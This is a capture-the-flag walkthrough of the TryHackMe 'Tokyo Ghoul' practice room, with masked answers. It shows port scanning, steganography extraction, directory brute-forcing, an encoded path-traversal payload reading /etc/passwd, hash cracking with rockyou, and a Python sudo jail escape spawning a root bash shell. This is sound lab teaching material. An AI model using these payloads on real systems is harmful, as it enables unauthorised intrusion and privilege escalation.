Mar 21
TryHackMe: Tokyo Ghoul
Today we will take a look at TryHackMe: Tokyo Ghoul My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes. Then you can start watching the anime. ;)
Recon
Task 1: About the room
# Read the above
> No answer needed
# Deploy the machine
> No answer needed
Task 2: Where am i ?
#Use nmap to scan all ports
Command: sudo nmap -sS -sC -sV -oN nmap/initial $IP
# How many ports are open ?
Answer: *
# What is the OS used ?
> U*****
Task 3: Planning to escape
#Did you find the note that the others ghouls gave you? where did you find it ?
> j********.****
# What is the key for Rize executable?
##Let’s check the ftp port and get the files we need from inside
Command: ftp IP
##Let’s look at the files.
## Here we see the ELF (Extensible Linking Format) File
## Let’s give the authority to work
Command: sudo chmod +x need_to_talk
Command: ./need_to_talk
## Return the characters to the letters using the Strings command
Command: strings need_to_talk
> k********
# Use a tool to get the other note from Rize .
## Let’s restart the file because we found the password.
## Now let’s get the note from the picture with the given paraphrase
Command: steghide extract -sf rize_and_kaneki.jpg
Task 4 What Rize is trying to say?
# What the message mean did you understand it ? what it says?
## When we open the text, we are greeted by the Morse code.
## Let’s try to read
## We are confronted with mixed codes. We do not know what it is, so we turn to CyberChef
> d***************
# Can you see the weakness in the dark ? no ? just search
## Let’s check the site directory
> gobuster dir -u http://10.10.255.75/d******/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
## The new page gives us a choice, I checked both and they come to the same place.
# What did you find something ? crack it
## I wanted to look for LFI, but he answered me like this
## So you need to bypass the back filter. Let’s do some research.
https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt
## /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
## I’m not silly dude ;)
# What is rize username ?
> k********
# What is rize password ?
## Let’s use John and the rockyou list.
Command: sudo john hash — wordlist=/usr/share/wordlists/rockyou.txt
> p**********
Task 5: Fight Jason
# User.txt
## Let’s connect with ssh.
Command: ssh username@IP
# root.txt
## Check list the allowed commands
Command: sudo -l
## We see jail python here. After some research, I found a bypass
Command: __builtins__.__dict__[‘__IMPORT__’.lower()](‘PTY’.lower()).__dict__[‘SPAWN’.lower()](‘/bin/bash’)
## And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
